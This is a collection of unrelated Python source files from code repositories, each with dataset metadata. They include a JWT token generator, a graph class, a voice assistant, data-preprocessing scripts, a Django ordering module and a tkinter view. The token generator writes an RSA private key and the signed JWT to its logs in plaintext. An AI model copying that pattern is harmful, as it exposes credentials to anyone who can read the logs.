encoded_claim\r\n input_signature = bytearray(combined_header_claim)\r\n logging.info('input_signature:: %s', input_signature)\r\n\r\n RSA_PRIVATE_KEY = open('privateKey.properties').read()\r\n logging.info('RSA_PRIVATE_KEY:: %s', RSA_PRIVATE_KEY)\r\n\r\n\r\n encoded_sign = GenerateAccessTokenHandler.sign_data(RSA_PRIVATE_KEY, input_signature)\r\n logging.info('encoded_sign:: %s', encoded_sign)\r\n\r\n\r\n jwt = str(encoded_header + \".\" + encoded_claim + \".\"+ encoded_sign)\r\n logging.info('jwt:: %s', jwt)\r\n\r\n payload = \"\"\"{\"grant_type\": \"urn:ietf:params:oauth:grant-type:jwt-bearer\",\"assertion\":\\\"\"\"\"+jwt+\"\"\"\\\"}\"\"\"\r\n request_header = {\"content-type\": \"application/json\"}\r\n\r\n logging.info('payload:: %s', payload)\r\n\r\n #https://trstoaapp1.vm.itg.corp.us.shldcorp.com:8553/oauthAS/service/oAuth/token.json\r\n\r\n try:\r\n retry_count = 5\r\n count = 1\r\n while(count <= retry_count):\r\n headers = {'Content-Type': 'application/json'}\r\n urlfetch.set_default_fetch_deadline(10)\r\n result = urlfetch.fetch(\r\n url='https://oauthas.searshc.com/oauthAS/service/oAuth/token.json',\r\n payload=payload,\r\n method=urlfetch.POST,\r\n headers=headers)\r\n logging.info('****Try #: %s', count)\r\n logging.info('****result.status_code: %s', result.status_code)\r\n logging.info('****result.content: %s', result.content)\r\n if(result.status_code != 200):\r\n count = count + 1\r\n continue\r\n else:\r\n break\r\n\r\n self.response.write(result.content)\r\n except urlfetch.Error:\r\n logging.exception('Caught exception fetching url')\r\n\r\n\r\n# [START app]\r\napp = webapp2.WSGIApplication([\r\n ('/generateAccessToken', GenerateAccessTokenHandler)\r\n], debug=True)\r\n\r\n# [END app]\r\n\r\n\r\ndef main():\r\n app.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"src/Production-AccessTokenGeneration/generateAccessToken.py","file_name":"generateAccessToken.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"545764206","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n#\n# Copyright 2015-2021, Vincenzo Arcidiacono;\n# Licensed under the EUPL (the 'Licence');\n# You may not use this work except in compliance with the Licence.\n# You may obtain a copy of the Licence at: http://ec.europa.eu/idabc/eupl\n\n\"\"\"\nIt contains the `DiGraph` class.\n\"\"\"\n\n\nclass DiGraph:\n __slots__ = 'nodes', 'succ', 'pred'\n\n def __reduce__(self):\n return self.__class__, (self.nodes, self.succ)\n\n def __init__(self, nodes=None, adj=None):\n self.nodes = {} if nodes is None else nodes\n self.succ = {} if adj is None else adj\n self.pred = pred = {}\n for u, e in self.succ.items():\n for v, attr in e.items():\n pred[v] = d = pred.get(v, {})\n d[u] = attr\n keys = set(self.succ).union(self.pred).union(self.nodes)\n self.nodes.update({k: {} for k in keys - set(self.nodes)})\n self.succ.update({k: {} for k in keys - set(self.succ)})\n self.pred.update({k: {} for k in keys - set(self.pred)})\n\n def __getitem__(self, item):\n return self.succ[item]\n\n @property\n def adj(self):\n return self.succ\n\n @staticmethod\n def _add_node(nodes, succ, pred, n, **attr):\n if n not in nodes: # Add nodes.\n succ[n], pred[n], nodes[n] = {}, {}, attr\n elif attr:\n nodes[n].update(attr)\n\n @staticmethod\n def _remove_node(nodes, succ, pred, n):\n for u in succ[n]:\n del pred[u][n]\n for u in pred[n]:\n del succ[u][n]\n del nodes[n], succ[n], pred[n]\n\n def add_node(self, n, **attr):\n self._add_node(self.nodes, self.succ, self.pred, n, **attr)\n return self\n\n def remove_node(self, n):\n self._remove_node(self.nodes, self.succ, self.pred, n)\n return self\n\n def add_nodes_from(self, nodes_for_adding):\n nodes, succ, pred, fn = self.nodes, self.succ, self.pred, self._add_node\n for n in nodes_for_adding:\n try:\n fn(nodes, succ, pred, n)\n except TypeError:\n fn(nodes, succ, pred, n[0], **n[1])\n return self\n\n def remove_nodes_from(self, nodes):\n nd, succ, pred, fn = self.nodes, self.succ, self.pred, self._remove_node\n for n in nodes:\n fn(nd, succ, pred, n)\n return self\n\n @staticmethod\n def _add_edge(nodes, succ, pred, u, v, **attr):\n DiGraph._add_node(nodes, succ, pred, u)\n DiGraph._add_node(nodes, succ, pred, v)\n succ[u][v] = pred[v][u] = dd = succ[u].get(v, {})\n dd.update(attr)\n\n def add_edge(self, u, v, **attr):\n self._add_edge(self.nodes, self.succ, self.pred, u, v, **attr)\n return self\n\n def add_edges_from(self, ebunch_to_add):\n nodes, succ, pred, fn = self.nodes, self.succ, self.pred, self._add_edge\n for e in ebunch_to_add:\n try:\n (u, v), attr = e, {}\n except ValueError:\n u, v, attr = e\n fn(nodes, succ, pred, u, v, **attr)\n\n def remove_edge(self, u, v):\n del self.succ[u][v], self.pred[v][u]\n\n def remove_edges_from(self, ebunch):\n succ, pred = self.succ, self.pred\n for e in ebunch:\n u, v = e[:2] # ignore edge data\n del succ[u][v], pred[v][u]\n\n @property\n def edges(self):\n from .dsp import stack_nested_keys\n return dict(stack_nested_keys(self.succ, depth=2))\n\n def has_edge(self, u, v):\n try:\n return v in self.succ[u]\n except KeyError:\n return False\n\n def subgraph(self, nodes):\n nodes = {n: attr.copy() for n, attr in self.nodes.items() if n in nodes}\n adj = {}\n for u, d in self.succ.items():\n if u in nodes:\n adj[u] = {v: attr.copy() for v, attr in d.items() if v in nodes}\n return self.__class__(nodes, adj)\n\n def copy(self):\n nodes = {n: attr.copy() for n, attr in self.nodes.items()}\n adj = {}\n for u, d in self.succ.items():\n adj[u] = {v: attr.copy() for v, attr in d.items()}\n return self.__class__(nodes, adj)\n","sub_path":"Lib/site-packages/schedula/utils/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508513506","text":"import pyttsx3\r\nimport win32com\r\nimport speech_recognition as sr\r\nimport pyspeech\r\nimport os\r\nimport re\r\n\r\ntry:\r\n\r\n engine = pyttsx3.init()\r\n\r\nexcept ImportError:\r\n print('requested Driver not found')\r\nexcept RuntimeError:\r\n print('Driver fails to initialised')\r\nvoices = engine.getProperty('voices')\r\nfor voice in voices:\r\n print(voice.id)\r\nengine.setProperty('voice', '')\r\n\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', rate)\r\n\r\n\r\ndef speak(cmd):\r\n engine.say(cmd)\r\n engine.runAndWait()\r\n\r\n\r\ndef read_voice():\r\n voice_text = ''\r\n print('Listening...')\r\n speech = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n audio = speech.listen(source)\r\n try:\r\n voice_text = speech.recognize_google(audio)\r\n except sr.UnknownValueError:\r\n pass\r\n except sr.RequestError as e:\r\n speak(\"Internet is not connected\")\r\n exit(1)\r\n return voice_text\r\n\r\n\r\nif __name__ == '__main__':\r\n speak(\"hello,I am Caption Jakesparrow as your artificial intelligence\")\r\n\r\nwhile True:\r\n voice_note = read_voice()\r\n\r\n print(\"you said: {}\".format(voice_note))\r\n\r\n if \"hello\" in voice_note:\r\n speak('hello sir, how can i help you?')\r\n continue\r\n elif \"name\" in voice_note:\r\n speak('My name is Caption Jacksparrow')\r\n continue\r\n elif \"open\" in voice_note:\r\n speak(\"ok sir..\")\r\n os.open('C:\\\\ ', \"r\")\r\n continue\r\n elif \"bye\" in voice_note:\r\n speak(\"bye sir, Happy to help you. have a good day..\")\r\n exit()\r\n\r\n","sub_path":"assistance/shreya_ver_1.py","file_name":"shreya_ver_1.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496725022","text":"import os\nimport csv\nimport pandas as pd\nimport time\nimport cv2\n\n\ndef convert(size, box):\n\tdw = 1./(size[0])\n\tdh = 1./(size[1])\n\tx = (box[0] + box[1])/2.0 - 1\n\ty = (box[2] + box[3])/2.0 - 1\n\tw = box[1] - box[0]\n\th = box[3] - box[2]\n\tx = x*dw\n\tw = w*dw\n\ty = y*dh\n\th = h*dh\n\treturn (x,y,w,h)\n\ngt_path='/home/macho/Desktop/Aletheia-AI/datasets/preprocess_and_validation/convert2Yolo/labels/annotations.txt'\nimages_path='/home/macho/Desktop/Aletheia-AI/datasets/preprocess_and_validation/convert2Yolo/images/'\nsave_label_path='/home/macho/Desktop/Aletheia-AI/datasets/preprocess_and_validation/convert2Yolo/labels/'\nfd = open(gt_path, 'r')\nlines = fd.readlines()\n\nfind_lbl=[]\nfor line in lines:\n\tline = line.strip().split(',')\n\tnumboxes=int(line[1])#int((len(line)-1)/5)\n\n\t#print('image name-->',line[0])\n\tframe=cv2.imread(images_path+line[0])\n\twidth = int(frame.shape[1])\n\theight= int(frame.shape[0])\n\n\tlabel_name=line[0].split('.')[0]\n\t#frame_=frame.copy()\n\n\twith open(save_label_path+label_name+'.txt','w') as fw:\n\t\t# print(\"is image mein \",line[0] ,\"itny bounding box hain\",line[1],\"boxes -->\")\n\n\t\tfor i in range(2,numboxes*6,6):\n\t\t\t#print(i)\n\t\t\tx=int(line[i+1])\n\t\t\ty=int(line[i+2])\n\t\t\tw=int(line[i+3])#+x\n\t\t\th=int(line[i+4])#+y\n\t\t\t# #print(line[i],line[i+1],line[i+2],line[i+3],line[i+4],line[i+5])\n\t\t\tb=[]\n\t\t\tb.append(x)\n\t\t\tb.append(w)\n\t\t\tb.append(y)\n\t\t\tb.append(h)\n\t\t\tfind_lbl.append(line[i+5].strip())\n\t\t\t# cv2.rectangle(frame, (x,y), (w,h),(0,0,255), 2)\n\t\t#cv2.imshow('frame',frame)\n\t\t#cv2.waitKey(0)\n\t\t\t#frame_=frame.copy()\n\t\t\t#print(b)\n\t\t\tbb = convert((width,height), b)\n\t\t# \tlabel=''\n\t\t\ttemp=line[i+5].strip()\n\t\t\tif temp=='person':\n\t\t\t\tlabel='0'\n\t\t\t# if temp=='null':\n\t\t\t# \tlabel='0'\n\t\t\t\n\t\t\tif temp not in find_lbl:\n\t\t\t\tprint(\"garbar\",temp,len(temp))\n\t\t\tfw.write('0 '+\" \".join([str(a) for a in bb])+'\\n')\n\tfw.close()\nprint(set(find_lbl))","sub_path":"yolo_preprocessing.py","file_name":"yolo_preprocessing.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"640084367","text":"import random\n\nstormtrooper = { \"name\": \"stormtrooper\",\n \"description\": \"Can't shoot for shit\",\n \"health\": random.randint(1,10),\n \"damage\": random.randint(1,100),\n \"items\":[\"blaster\",\"helmet\"],\n \"killwords\":[\"bang\",\"pew\",\"shoot\",\"kill\"]\n }\n\n\ngreedo = { \"name\": \"Greedo\",\n \"description\":\"Who shot first?\",\n \"health\":50,\n \"damage\":20,\n \"items\":[\"password\"],\n \"killwords\":[\"bang\",\"pew\",\"shoot\",\"kill\"]\n }\n\ndarth_kirill = { \"name\" : \"Darth Kirill\",\n \"description\": \"He is your lecturer.\",\n \"health\" : 100,\n \"damage\": 100,\n \"items\": [\"lightsaber\",\"mask\",\"cigarettes\"],\n \"killwords\":[\"clash\",\"strike\",\"force push\",\"force choke\",\"hit\"]\n }\n","sub_path":"enemies.py","file_name":"enemies.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246313725","text":"import numpy as np\nimport networkx as nx\nimport random\n\n\ndef load_graph_directed(file):\n # loading edges from file\n edge_list = np.loadtxt(file, dtype=int)\n\n # create the graph\n g = nx.DiGraph()\n g.add_edges_from(edge_list)\n\n # adding attributes to nodes and edges\n for n in g.nodes():\n # adding threshold to node\n g.add_node(n, t=np.random.random())\n # adding weight to the edge\n in_deg = g.in_degree(n)\n if in_deg != 0:\n g.add_edges_from(g.in_edges(n), w=(1/in_deg))\n # adding activation weights\n g.add_edges_from(g.edges(), w1=0)\n g.add_edges_from(g.edges(), w2=0)\n g.add_edges_from(g.edges(), free_end=1)\n # defining 3 lists to hold free nodes, first player and second player nodes\n g.graph['free'] = g.nodes()\n g.graph['1'] = []\n g.graph['2'] = []\n\n return g\n\n\ndef load_graph_undirected(file):\n # loading edges from file\n edges = np.loadtxt(file, dtype=int)\n\n edge_list = np.zeros((2 * edges.shape[0], 2))\n edge_list[0:edges.shape[0], :] = edges[:, :]\n\n edge_list[edges.shape[0]:, 0] = edges[:, 1]\n edge_list[edges.shape[0]:, 1] = edges[:, 0]\n\n # create the graph\n g = nx.DiGraph()\n g.add_edges_from(edge_list)\n\n # adding attributes to nodes and edges\n for n in g.nodes():\n # adding threshold to node\n g.add_node(n, t=np.random.random())\n # adding weight to the edge\n in_deg = g.in_degree(n)\n if in_deg != 0:\n g.add_edges_from(g.in_edges(n), w=(1/in_deg))\n # adding activation weights\n g.add_edges_from(g.edges(), w1=0)\n g.add_edges_from(g.edges(), w2=0)\n g.add_edges_from(g.edges(), free_end=1)\n # defining 3 lists to hold free nodes, first player and second player nodes\n g.graph['free'] = g.nodes()\n g.graph['1'] = []\n g.graph['2'] = []\n\n return g\n\n\ndef activate_node(g, node, player):\n # First setting the edge weight to be activated\n for u, v, d in g.edges(node, data=True):\n d['w'+str(player)] = d['w']\n # Second adding nodes to lists\n g.graph['free'].remove(node)\n if player == 1:\n g.graph['1'].append(node)\n elif player == 2:\n g.graph['2'].append(node)\n # Third setting edges to be non free(free=0)\n for edge in g.in_edges(node, data=True):\n edge[2]['free_end'] = 0\n\n return\n\n\ndef diffuse(g):\n activated_first = []\n activated_second = []\n\n activated_nodes = g.graph['1'] + g.graph['2']\n free_nodes_set = set(g.graph['free'])\n\n for node_parent in activated_nodes:\n for node in g.neighbors(node_parent):\n if node in free_nodes_set:\n threshold = g.node[node]['t']\n sum1 = g.in_degree(node, 'w1')\n sum2 = g.in_degree(node, 'w2')\n if sum1 > threshold and sum1 > sum2:\n activated_first.append(node)\n if sum2 > threshold and sum2 > sum1:\n activated_second.append(node)\n\n activated_first = np.unique(activated_first)\n activated_second = np.unique(activated_second)\n return activated_first, activated_second\n\n\ndef get_feature(g):\n # 0. Number of free nodes\n # 1. Summation of degrees of all free nodes\n # 2. Summation of weight of the edges for which both vertices are free\n # 3. Maximum degree among all free nodes\n # 4. Maximum sum of free out-edge weight of a node among all nodes\n # 5. Maximum sum of free out-edge weight of a node among nodes which are the first player's neighbors\n # 6. Maximum sum of free out-edge weight of a node among nodes which are the second player's neighbors\n\n f = np.zeros(7)\n free_nodes = g.graph['free']\n free_nodes_set = set(free_nodes)\n\n first_player_neighbors = set()\n for node in g.graph['1']:\n first_player_neighbors |= set(g.neighbors(node))\n second_player_neighbors = set()\n for node in g.graph['2']:\n second_player_neighbors |= set(g.neighbors(node))\n\n # 0\n f[0] = len(free_nodes)\n # 1, 3\n degrees = list(g.out_degree(free_nodes).values())\n if degrees:\n f[1] = sum(degrees)\n f[3] = max(degrees)\n\n # 2, 4, 5, 6\n f2 = 0\n max4 = 0\n max5 = 0\n max6 = 0\n\n for node in free_nodes:\n weight_free = 0\n for edge in g.edges(node, data=True):\n if edge[1] in free_nodes_set:\n weight_free += edge[2]['w']\n f2 += weight_free\n\n if weight_free > max4:\n max4 = weight_free\n if node in first_player_neighbors:\n if weight_free > max5:\n max5 = weight_free\n if node in second_player_neighbors:\n if weight_free > max6:\n max6 = weight_free\n\n f[2] = f2\n f[4] = max4\n f[5] = max5\n f[6] = max6\n\n return f\n\n\ndef feature_map_lmh(feature, feature_lmh_ranges):\n result = np.zeros(7)\n for i in range(7):\n if feature[i] < feature_lmh_ranges[i, 0]:\n result[i] = 0\n elif feature_lmh_ranges[i, 0] <= feature[i] < feature_lmh_ranges[i, 1]:\n result[i] = 1\n elif feature[i] >= feature_lmh_ranges[i, 1]:\n result[i] = 2\n\n return result\n\n\ndef feature_map_number(feature_lmh):\n n = 0\n for i in range(7):\n n += feature_lmh[i]*pow(3, 6-i)\n\n return int(n)\n\n\ndef get_state(g: nx.Graph):\n r1 = len(g.graph['1'])\n r2 = len(g.graph['2'])\n diff = r1 - r2\n\n r = 0\n if diff < -100:\n r = 0\n elif -100 <= diff < -50:\n r = 1\n elif -50 <= diff < 0:\n r = 2\n elif 0 <= diff < 50:\n r = 3\n elif 50 <= diff < 100:\n r = 4\n elif 100 <= diff:\n r = 5\n\n return r\n\n\ndef create_random_graph(g: nx.Graph):\n n1 = random.randint(1, len(g.graph['free']) - 2)\n n2 = random.randint(1, len(g.graph['free']) - n1)\n for i in range(n1):\n r = random.randint(0, len(g.graph['free']) - 1)\n activate_node(g, g.graph['free'][r], 1)\n for i in range(n2):\n r = random.randint(0, len(g.graph['free']) - 1)\n activate_node(g, g.graph['free'][r], 2)\n return g\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"594878797","text":"##\n## Imprima los valores unicos e la columna _c4 de \n## de la tabla tbl1 en mayusculas\n## \n\n\nimport pandas as pd\nimport numpy as np\ndf=pd.read_csv('tbl0.tsv',delimiter='\\t')\ndg=pd.read_csv('tbl1.tsv',delimiter='\\t')\ndh=pd.read_csv('tbl2.tsv',delimiter='\\t')\n\n#Respuesta\n\nunique= dg['_c4'].unique() \nunique2= unique.tolist()\nunique3 = [elemt.upper() for elemt in unique2]\nunique3.sort()\nunique3","sub_path":"q04.py","file_name":"q04.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162253522","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import render\n\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nimport json\nfrom django.contrib.auth.decorators import login_required\nimport logging\n\nfrom proil_order.models import *\nfrom main.models import *\nfrom main.forms import Validator\nfrom datetime import datetime, timedelta, time\nfrom proil_profile.models import FavoriteAddress\nfrom proil_profile.models import UserDiscount\n\nlogger = logging.getLogger('django')\n\ndef get_dates(cnt):\n dates = []\n if cnt == 0:\n return []\n dates.append(datetime.today().date())\n delta = timedelta(days=1)\n while (cnt - 1):\n dates.append(dates[-1] + delta)\n cnt-=1\n return dates\n\ndef get_free_intervals(date):\n date = date.split('.')\n if len(date) == 3:\n busy_intervals = set()\n result = []\n all_intervals = TimeInterval.objects.all()\n for rt in ReservedTime.objects.filter(date__year=int(date[2]), date__month=int(date[1]), date__day=int(date[0])):\n if rt.time_interval.reserve_times <= rt.times:\n busy_intervals.add(rt.time_interval.get_interval())\n date = '{}/{}/{}'.format(date[2], date[1], date[0])\n try:\n for ti in all_intervals:\n FMT = '%Y/%m/%d %H:%M:%S'\n delta = timedelta(minutes=15)\n begin = datetime.strptime('{} {}'.format(date, str(ti.begin)), FMT)\n end = datetime.strptime('{} {}'.format(date, str(ti.end)), FMT)\n now = datetime.now()\n t = ti.get_interval()\n if end < now or now > begin + delta and now < end or t in busy_intervals:\n logger.info(\"begin {} end {} now {}\".format(begin,end,now))\n continue\n result.append(t)\n logger.info(\"Free intervals\")\n logger.info(result)\n logger.info('Busy intervals')\n logger.info(busy_intervals)\n result.sort()\n return ({'status': 'ok', 'data' : result })\n except Exception as e:\n pass\n return ({ 'status': 'error' , 'mes': 'Incorrect parameter date, pattern day.month.year' })\n\ndef get_all_free_intervals():\n free_intervals = []\n all_free_intervals = []\n today = datetime.today().date()\n delta = timedelta(days=30)\n all_intervals = TimeInterval.objects.all()\n\n busy_intervals = set()\n FMT_D = '%d-%m-%Y'\n for rt in ReservedTime.objects.filter(date__gte=today).filter(date__lte=today + delta):\n if rt.time_interval.reserve_times <= rt.times:\n busy_intervals.add('{} {}'.format(rt.date.strftime(FMT_D), rt.time_interval.get_interval()))\n\n for date in get_dates(30):\n date = date.strftime(FMT_D)\n all_free_intervals.append([date, []])\n for ti in all_intervals:\n FMT = '%d-%m-%Y %H:%M:%S'\n delta = timedelta(minutes=15)\n begin = datetime.strptime('{} {}'.format(date, str(ti.begin)), FMT)\n end = datetime.strptime('{} {}'.format(date, str(ti.end)), FMT)\n now = datetime.now()\n t = ti.get_interval()\n if now.strftime(FMT_D) == date and (end < now or now > begin + delta and now < end or (date + ' ' + t) in busy_intervals):\n continue\n all_free_intervals[-1][1].append(t)\n all_free_intervals[-1][1].sort()\n\n return ({'status': 'ok', 'data' : all_free_intervals })\n\ndef create_order(user, order_time, order_date, order_phone, order_location, order_options, order_products, car_number, car_region, comment=None):\n (begin, end) = order_time.split('-')\n date = order_date.split('.')\n order_date = datetime(int(date[2]),int(date[1]),int(date[0])).date()\n logger.info(order_date)\n if not (begin and end):\n return (False, \"Time interval is incorrect\")\n time_interval = TimeInterval.objects.get(begin='{}:00'.format(begin), end='{}:00'.format(end))\n logger.info(time_interval)\n order_products = json.loads(order_products)\n logger.info(order_products)\n for p in order_products.keys():\n if str(order_products[p]).isdigit() and int(order_products[p]) <= 0:\n order_products.pop(p, None)\n logger.info(order_products)\n order_location = json.loads(order_location)\n if not ('address' in order_location and 'coordinates' in order_location):\n return (False, \"Incorrect location\")\n order_options = json.loads(order_options)\n product_names = order_products.keys()\n products = Product.objects.filter(name__in=product_names)\n options = Option.objects.filter(id__in=order_options)\n logger.info(products)\n logger.warn(product_names);\n reserved_time = None\n try:\n reserved_time = ReservedTime.objects.get(time_interval=time_interval, date=order_date)\n except:\n logger.info('New reserved time')\n reserved_time = ReservedTime.objects.create(time_interval=time_interval, date=order_date, times=0)\n\n if reserved_time.times >= time_interval.reserve_times:\n return (False, u\"Пока вы оформляли заказ, выбранный временной промежуток переполнился, пожалуйста выберите другой промежуток на 2ом шаге заказа\")\n reserved_time.times = reserved_time.times + 1\n reserved_time.users.add(user)\n reserved_time.save()\n logger.info(reserved_time)\n\n if len(products) != len(product_names):\n return (False, \"Products error\")\n if len(options) != len(order_options):\n return (False, \"Options error\")\n empty_oil_error = True\n bulk_order_product = []\n total = 0.0\n for p in products:\n amount = 0\n if p.is_oil or p.is_full:\n empty_oil_error = False\n\n amount = order_products[p.name]\n total += float(amount) * float(p.price)\n if float(amount) > 0.0:\n bulk_order_product.append(OrderProduct(product=p,amount=amount))\n\n if empty_oil_error:\n return (False, \"Oil error\")\n status = Status.objects.get(name='processing')\n car = None\n try:\n car = Car.objects.get(user=user, car_number = car_number, car_region = car_region)\n except Exception as e:\n logger.error(e)\n return (False, 'Автомобиль с номером {} и регионом {} не найден'.format(car_number, car_region))\n\n order = Order.objects.create(\n user=user,\n car = car,\n reserved_time = reserved_time,\n delivery_address = order_location['address'],\n delivery_coordinates = order_location['coordinates'],\n total = total,\n comment = comment,\n status = status,\n order_phone = order_phone\n )\n for option in options:\n order.options.add(option)\n if len(options):\n order.save()\n for order_product in bulk_order_product:\n order_product.order = order\n logger.info(order)\n OrderProduct.objects.bulk_create(bulk_order_product);\n \n return (True, order)\n","sub_path":"proil_order/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308428826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 20 06:13:13 2020\n\n@author: farhan\n\"\"\"\n\n#this script combines the .ss_sa feature. Takes input fasta_chain_1, fasta_chain_2, ss_sa_file1, and ss_sa_file2\n#usage: python combineSS_SA.py \n\nimport sys,os\n\ndef readFasta(file):\n l=\"\"\n seq=\"\"\n with open (file,\"r\") as f:\n l=f.readline().strip()\n #name=l.split()[0].replace(\">\",\"\").strip()\n seq=f.readline().strip()\n ss=f.readline().strip()\n sa=f.readline().strip()\n \n #print (name)\n \n L=len(seq)\n return L,seq,ss,sa\n\n#fastafile1=os.path.abspath(sys.argv[1])\n#fastafile2=os.path.abspath(sys.argv[2])\nss_file1=os.path.abspath(sys.argv[1])\nss_file2=os.path.abspath(sys.argv[2])\n\nname_1=os.path.basename(ss_file1).replace(\".ss_sa\",\"\").replace(\".fasta\",\"\")\nname_2=os.path.basename(ss_file2).replace(\".ss_sa\",\"\").replace(\".fasta\",\"\")\nchain_1=name_1.split(\"_\")[-1][-1]\nchain_2=name_2.split(\"_\")[-1][-1]\n\nL_1,seq_1,ss_1,sa_1=readFasta(ss_file1)\nL_2,seq_2,ss_2,sa_2=readFasta(ss_file2)\nnew_name=name_1.split(\"_\")[0]+\"_\"+chain_1+chain_2\nprint (name_1,chain_1,L_1,seq_1,ss_1,sa_1)\n#sys.exit()\n\n\nif (len(sys.argv)==4):\n outfile=os.path.abspath(sys.argv[3])\nelse:\n outfile=os.path.dirname(ss_file1)+\"/\"+os.path.basename(ss_file1)[0:4]+\"_\"+chain_1+chain_2+\".ss_sa\"\nif not os.path.isdir(os.path.dirname(outfile)): os.makedirs(os.path.dirname(outfile))\n\n\n\n\nss1=[] \nss1.append(\">\"+new_name)\nss1.append(seq_1+seq_2)\nss1.append(ss_1+ss_2)\nss1.append(sa_1+sa_2)\n\nwith open (outfile,\"w\") as f:\n for line in ss1:\n f.write(line+\"\\n\")\n print (line)\n\nwith open (outfile.replace(\".ss_sa\",\".ss\"),\"w\") as f:\n f.write(ss1[0]+\"\\n\")\n f.write(ss1[2]+\"\\n\")\n print (line)\n\nwith open (outfile.replace(\".ss_sa\",\".acc\"),\"w\") as f:\n f.write(ss1[0]+\"\\n\")\n f.write(ss1[3]+\"\\n\")\n print (line)\n","sub_path":"libs/scripts/feature_gen_hetero/combineSS_SA.py","file_name":"combineSS_SA.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"148327006","text":"def readData(filename):\n\tinputFile = open(filename)\n\n\tgrid = []\n\n\tfor line in inputFile:\n\t\tline = line.strip().split(' ')\n\t\tline = [int(x) for x in line]\n\t\tgrid.append(line)\n\n\treturn grid\n\n#Does the same thing as the above function, one line for shits and giggles\ndef readData2(filename):\n\treturn [[int(x) for x in line.strip().split(' ')] for line in open(filename)]\n\ndef findMaxProd(grid, n):\n\tmaxHorizProd, maxVertProd, maxDownAndRightDiag, maxUpAndRightDiag = 0, 0, 0, 0\n\tlength = len(grid)\n\n\tfor row in range(0, length):\n\t\tfor i in range(0, length):\n\t\t\tvertProd = grid[row][i]\n\t\t\thorizProd = grid[row][i]\n\t\t\tdownandRightDiag = grid[row][i]\n\t\t\tupAndRightDiag = grid[row][i]\n\n\t\t\tfor j in range(1, n):\n\t\t\t\tvertProd *= grid[(row + j) % length][i]\n\t\t\t\thorizProd *= grid[row][(i + j) % length]\n\t\t\t\tdownandRightDiag *= grid[(row + j) % length][(i + j) % length]\n\t\t\t\tupAndRightDiag *= grid[(row - j)][(i + j) % length]\n\n\t\t\tmaxHorizProd = max(maxHorizProd, horizProd)\n\t\t\tmaxVertProd = max(maxVertProd, vertProd)\n\t\t\tmaxDownAndRightDiag = max(maxDownAndRightDiag, downandRightDiag)\n\t\t\tmaxUpAndRightDiag = max(maxUpAndRightDiag, upAndRightDiag)\n\n\treturn max(maxHorizProd, maxVertProd, maxDownAndRightDiag, maxUpAndRightDiag)\n\n\ndef findLargestProd(filename, n):\n\tgrid = readData2(filename)\n\treturn findMaxProd(grid, n)\n\ndef main():\n\tprint(findLargestProd(\"LargeGridProd.in\", 4))\n\nmain()","sub_path":"Python/LargeGridProd.py","file_name":"LargeGridProd.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71538276","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom pubsub import pub\r\nfrom PIL import Image\r\nfrom PIL import ImageTk\r\nclass View:\r\n\r\n def __init__(self, parent):\r\n # initialize variables\r\n self.container = parent\r\n self.flagLoadImage = FALSE\r\n self.hut_width = 40\r\n self.hut_height = 56\r\n\r\n #Publishes a message to notify the Controller.\r\n\r\n #Uses PyPubSub to publish a message to a topic Radio_button_pressed.\r\n #The 'subscriber' here is the Controller which gets notified.\r\n\r\n\r\n def setup(self): # run first\r\n \"\"\"Calls methods to setup the user interface.\"\"\"\r\n self.create_widgets()\r\n self.setup_layout()\r\n\r\n def loadImg(self):\r\n pub.sendMessage(\"OpenFile_Button_Pressed\")\r\n self.flagLoadImage = TRUE\r\n\r\n\r\n def create_widgets(self):\r\n \"\"\"Create various widgets in the tkinter main window.\"\"\"\r\n self.var = tk.IntVar()\r\n self.background_label = tk.Label(self.container)\r\n self.topFrame = Frame(self.container,borderwidth=2,highlightbackground=\"black\",highlightcolor=\"red\",highlightthickness=1,width=300, height=600)\r\n self.bottomFrame = Frame(self.container,borderwidth=2,highlightbackground=\"black\",highlightcolor=\"red\",highlightthickness=1,width=500, height=600)\r\n self.topFrame2 = Frame(self.topFrame)\r\n #button\r\n self.b1LoadImg = tk.Button(self.topFrame2, text = \"Load Image\",command = self.loadImg)\r\n self.b2LineDetect = tk.Button(self.topFrame2,text = \"Line Detection\",command = self.lineDetect)\r\n #scale bar\r\n self.scale1 = tk.Scale(self.topFrame, from_=1, to=20, orient = HORIZONTAL, length = 500,label ='pixel', command = self.scalerChange)\r\n self.scale1.set(1)\r\n self.scale2 = tk.Scale(self.topFrame, from_=1, to=130, orient = HORIZONTAL, length = 500,label ='threshold', command = self.scalerChange)\r\n self.scale2.set(50)\r\n self.scale3 = tk.Scale(self.topFrame, from_=1, to=500, orient = HORIZONTAL, length = 500,label ='mini line length', command = 